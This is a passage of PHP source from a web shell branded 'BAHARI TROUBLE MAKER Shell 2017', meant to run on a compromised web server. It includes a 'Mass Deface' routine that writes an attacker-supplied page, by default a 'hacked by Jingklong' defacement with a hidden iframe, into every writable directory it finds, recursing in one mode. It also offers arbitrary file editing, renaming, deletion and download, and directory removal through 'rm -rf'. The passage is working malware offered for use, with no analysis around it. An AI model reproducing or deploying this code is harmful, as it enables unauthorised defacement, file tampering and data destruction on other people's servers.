4127. $dira = scandir($dir);
4128. foreach($dira as $dirb) {
4129. $dirc = "$dir/$dirb";
4130. $lokasi = $dirc.'/'.$namafile;
4131. if($dirb === '.') {
4132. file_put_contents($lokasi, $isi_script);
4133. } elseif($dirb === '..') {
4134. file_put_contents($lokasi, $isi_script);
4135. } else {
4136. if(is_dir($dirc)) {
4137. if(is_writable($dirc)) {
4138. echo "[<font color=lime>DONE</font>] $lokasi<br>";
4139. file_put_contents($lokasi, $isi_script);
4140. $idx = sabun_massal($dirc,$namafile,$isi_script);
4141. }
4142. }
4143. }
4144. }
4145. }
4146. }
4147. function sabun_biasa($dir,$namafile,$isi_script) {
4148. if(is_writable($dir)) {
4149. $dira = scandir($dir);
4150. foreach($dira as $dirb) {
4151. $dirc = "$dir/$dirb";
4152. $lokasi = $dirc.'/'.$namafile;
4153. if($dirb === '.') {
4154. file_put_contents($lokasi, $isi_script);
4155. } elseif($dirb === '..') {
4156. file_put_contents($lokasi, $isi_script);
4157. } else {
4158. if(is_dir($dirc)) {
4159. if(is_writable($dirc)) {
4160. echo "<center><font color=red>DONE</font> -><font color=red>$dirb/$namafile</font></center>";
4161. file_put_contents($lokasi, $isi_script);
4162. }
4163. }
4164. }
4165. }
4166. }
4167. }
4168. function sabun_domen($dir,$namafile,$isi_script) {
4169. if(is_writable($dir)) {
4170. $dira = scandir($dir);
4171. foreach($dira as $dirb) {
4172. $dirc = "$dir/$dirb";
4173. $lokasi = $dirc.'/'.$namafile;
4174. if($dirb === '.') {
4175. file_put_contents($lokasi, $isi_script);
4176. } elseif($dirb === '..') {
4177. file_put_contents($lokasi, $isi_script);
4178. } else {
4179. if(is_dir($dirc)) {
4180. if(is_writable($dirc)) {
4181. echo "<center><a href='http://$dirb/$namafile' target='_blank'><font color=red>http://$dirb/$namafile</font></a></center>";
4182. file_put_contents($lokasi, $isi_script);
4183. }
4184. }
4185. }
4186. }
4187. }
4188. }
4189. if($_POST['start']) {
4190. if($_POST['tipe_sabun'] == 'mahal') {
4191. echo "<div style='margin: 5px auto; padding: 5px'>";
4192. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
4193. echo "</div>";
4194. } elseif($_POST['tipe_sabun'] == 'murah') {
4195. echo "<div style='margin: 5px auto; padding: 5px'>";
4196. sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
4197. echo "</div>";
4198. }elseif($_POST['tipe_sabun'] == 'diskon') {
4199. echo "<div style='margin: 5px auto; padding: 5px'>";
4200. sabun_domen($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
4201. echo "</div>";
4202. }
4203. } else {
4204. echo "<center>";
4205. echo "<form method='post'>
4206. <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
4207. <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<input type='radio' name='tipe_sabun' value='diskon'>domain<br>
4208. <font style='text-decoration: underline;'>Folder:</font><br>
4209. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
4210. <font style='text-decoration: underline;'>Filename:</font><br>
4211. <input type='text' name='d_file' value='asu.htm' style='width: 450px;' height='10'><br>
4212. <font style='text-decoration: underline;'>Index File:</font><br>
4213. <textarea name='script' style='width: 450px; height: 200px;'><style>
4214. body {
4215. background-repeat:no-repeat;
4216. background-attachment:fixed;
4217. background-image:url(https://scontent.xx.fbcdn.net/v/t1.0-9/16806977_1822047768055543_1379597830503128744_n.jpg?oh=359c6d0c3403665fd989433a9e817f29&oe=595F5C32);
4218. background-size:cover;
4219. }
4220. </style>
4221. <title>hacked by Jingklong</title>
4222. <meta content='galo mhanx :(' name='description'/>
4223. <meta content='hacked by Jingklong, bahari trouble maker' name='keywords'/>
4224. <meta content='hacked by Jingklong, bahari trouble maker' name='Abstract'/>
4225. <center>
4226. <pre><strong>
4227. <font size='5'><span style='color:red;'><br><br><br><br>
4228.  
4229. Aku bukan orang yang memegang hatimu, aku bukan yang ada dalam mimpimu, dan..
4230. Aku bukan orang yang selalu di pikiranmu, aku bukan subjek status fbmu.
4231. Bukan aku alasan mengapa kau tertawa dan mengapa kau menumpahkan air mata.
4232.  
4233. Aku bukan yang yang cari, aku bukan orang yang kau inginkan.
4234. Sedih untuk mengatakan aku bukan tujuanmu, aku hanya sebuah persinggahan.. di tengah perjalananmu.
4235. Aku hanya sekedar orang lain yang tidak sengaja kau temui.
4236. Karena aku bukan orang yang kau cintai, aku bukan yang anda butuhkan.
4237.  
4238. Aku bukan pilihanmu.
4239. ------------------
4240. Jingklong
4241.  
4242. .gr33tz
4243. $ <marquee style='width:390px;font-family:Courier;font-size:14px;color:red;'>Maniak k4Sur ~ Tanpa Bicara ~ Virusa w0rm ~ M2404 - Angel dot ID ~ Kefiex404 ~ ELRO-BN404 - Zombie-Root ~ Malaikat Galau - cTzEn - VinderError - KapalJetz666 | BAHARI TROUBLE MAKER - INDONESIAN DEFACER NEWBIE - INDONESIA DEFACER TERSAKITI</marquee> $
4244. </strong></font></pre>
4245. <iframe width='0%' height='0' src='http://www.smule.com/recording/flanella-kwk_riza-flanella-tiga-hari-yang-lalu-guitar/657107202_748590997' frameborder='0'></iframe></textarea><br>
4246. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
4247. </form></center>";
4248. }
4249. }
4250. elseif($_GET['act'] == 'newfile') {
4251. if($_POST['new_save_file']) {
4252. $newfile = htmlspecialchars($_POST['newfile']);
4253. $fopen = fopen($newfile, "a+");
4254. if($fopen) {
4255. $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
4256. } else {
4257. $act = "<font color=red>permission denied</font>";
4258. }
4259. }
4260. echo $act;
4261. echo "<form method='post'>
4262. Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
4263. <input type='submit' name='new_save_file' value='Submit'>
4264. </form>";
4265. } elseif($_GET['act'] == 'newfolder') {
4266. if($_POST['new_save_folder']) {
4267. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
4268. if(!mkdir($new_folder)) {
4269. $act = "<font color=red>permission denied</font>";
4270. } else {
4271. $act = "<script>window.location='?dir=".$dir."';</script>";
4272. }
4273. }
4274. echo $act;
4275. echo "<form method='post'>
4276. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
4277. <input type='submit' name='new_save_folder' value='Submit'>
4278. </form>";
4279. } elseif($_GET['act'] == 'rename_dir') {
4280. if($_POST['dir_rename']) {
4281. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
4282. if($dir_rename) {
4283. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
4284. } else {
4285. $act = "<font color=red>permission denied</font>";
4286. }
4287. echo "".$act."<br>";
4288. }
4289. echo "<form method='post'>
4290. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
4291. <input type='submit' name='dir_rename' value='rename'>
4292. </form>";
4293. } elseif($_GET['act'] == 'delete_dir') {
4294. if(is_dir($dir)) {
4295. if(is_writable($dir)) {
4296. @rmdir($dir);
4297. @exe("rm -rf $dir");
4298. @exe("rmdir /s /q $dir");
4299. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
4300. } else {
4301. $act = "<font color=red>could not remove ".basename($dir)."</font>";
4302. }
4303. }
4304. echo $act;
4305. } elseif($_GET['act'] == 'view') {
4306. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> <br>";
4307. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
4308. } elseif($_GET['act'] == 'edit') {
4309. if($_POST['save']) {
4310. $save = file_put_contents($_GET['file'], $_POST['src']);
4311. if($save) {
4312. $act = "<font color=lime>Saved!</font>";
4313. } else {
4314. $act = "<font color=red>permission denied</font>";
4315. }
4316. echo "".$act."<br>";
4317. }
4318. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> <br>";
4319. echo "<form method='post'>
4320. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
4321. <input type='submit' value='Save' name='save' style='width: 500px;'>
4322. </form>";
4323. } elseif($_GET['act'] == 'rename') {
4324. if($_POST['do_rename']) {
4325. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
4326. if($rename) {
4327. $act = "<script>window.location='?dir=".$dir."';</script>";
4328. } else {
4329. $act = "<font color=red>permission denied</font>";
4330. }
4331. echo "".$act."<br>";
4332. }
4333. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> <br>";
4334. echo "<form method='post'>
4335. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
4336. <input type='submit' name='do_rename' value='rename'>
4337. </form>";
4338. } elseif($_GET['act'] == 'delete') {
4339. $delete = unlink($_GET['file']);
4340. if($delete) {
4341. $act = "<script>window.location='?dir=".$dir."';</script>";
4342. } else {
4343. $act = "<font color=red>permission denied</font>";
4344. }
4345. echo $act;
4346. } else {
4347. if(is_dir($dir) === true) {
4348. if(!is_readable($dir)) {
4349. echo "<font color=red>can't open directory. ( not readable )</font>";
4350. } else {
4351. echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
4352. <tr>
4353. <th class="th_home"><center>Name</center></th>
4354. <th class="th_home"><center>Type</center></th>
4355. <th class="th_home"><center>Size</center></th>
4356. <th class="th_home"><center>Last Modified</center></th>
4357. <th class="th_home"><center>Owner/Group</center></th>
4358. <th class="th_home"><center>Permission</center></th>
4359. <th class="th_home"><center>Action</center></th>
4360. </tr>';
4361. $scandir = scandir($dir);
4362. foreach($scandir as $dirx) {
4363. $dtype = filetype("$dir/$dirx");
4364. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
4365. if(function_exists('posix_getpwuid')) {
4366. $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
4367. $downer = $downer['name'];
4368. } else {
4369. //$downer = $uid;
4370. $downer = fileowner("$dir/$dirx");
4371. }
4372. if(function_exists('posix_getgrgid')) {
4373. $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
4374. $dgrp = $dgrp['name'];
4375. } else {
4376. $dgrp = filegroup("$dir/$dirx");
4377. }
4378. if(!is_dir("$dir/$dirx")) continue;
4379. if($dirx === '..') {
4380. $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
4381. } elseif($dirx === '.') {
4382. $href = "<a href='?dir=$dir'>$dirx</a>";
4383. } else {
4384. $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
4385. }
4386. if($dirx === '.' || $dirx === '..') {
4387. $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
4388. } else {
4389. $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
4390. }
4391. echo "<tr>";
4392. echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
4393. echo "<td class='td_home'><center>$dtype</center></td>";
4394. echo "<td class='td_home'><center>-</center></th></td>";
4395. echo "<td class='td_home'><center>$dtime</center></td>";
4396. echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
4397. echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
4398. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
4399. echo "</tr>";
4400. }
4401. }
4402. } else {
4403. echo "<font color=red>can't open directory.</font>";
4404. }
4405. foreach($scandir as $file) {
4406. $ftype = filetype("$dir/$file");
4407. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
4408. $size = filesize("$dir/$file")/1024;
4409. $size = round($size,3);
4410. if(function_exists('posix_getpwuid')) {
4411. $fowner = @posix_getpwuid(fileowner("$dir/$file"));
4412. $fowner = $fowner['name'];
4413. } else {
4414. //$downer = $uid;
4415. $fowner = fileowner("$dir/$file");
4416. }
4417. if(function_exists('posix_getgrgid')) {
4418. $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
4419. $fgrp = $fgrp['name'];
4420. } else {
4421. $fgrp = filegroup("$dir/$file");
4422. }
4423. if($size > 1024) {
4424. $size = round($size/1024,2). 'MB';
4425. } else {
4426. $size = $size. 'KB';
4427. }
4428. if(!is_file("$dir/$file")) continue;
4429. echo "<tr>";
4430. echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
4431. echo "<td class='td_home'><center>$ftype</center></td>";
4432. echo "<td class='td_home'><center>$size</center></td>";
4433. echo "<td class='td_home'><center>$ftime</center></td>";
4434. echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
4435. echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
4436. echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
4437.  
4438. echo "</tr>";
4439. }
4440. echo "</table>";
4441. if(!is_readable($dir)) {
4442. //
4443. } else {
4444. echo"<br>";
4445. }
4446. }
4447. ?>
4448. <audio autoplay> <source src="http://www.soundescapestudios.com/SESAudio/SES%20Site%20Sounds/Beeps/Beeps-short-01.wav" type="audio/mpeg"></audio>
4449. <link href='http://fonts.googleapis.com/css?family=Give+You+Glory' rel='stylesheet' type='text/css'>
4450. </center></span><footer id="ftr" style="position:fixed; left:0px; right:0px; bottom:0px; background:transparent); text-align:right;">
4451. <font color="purple" size="2" face="Give You Glory">&copy; BAHARI TROUBLE MAKER Shell 2017</font></footer>
4452. </html>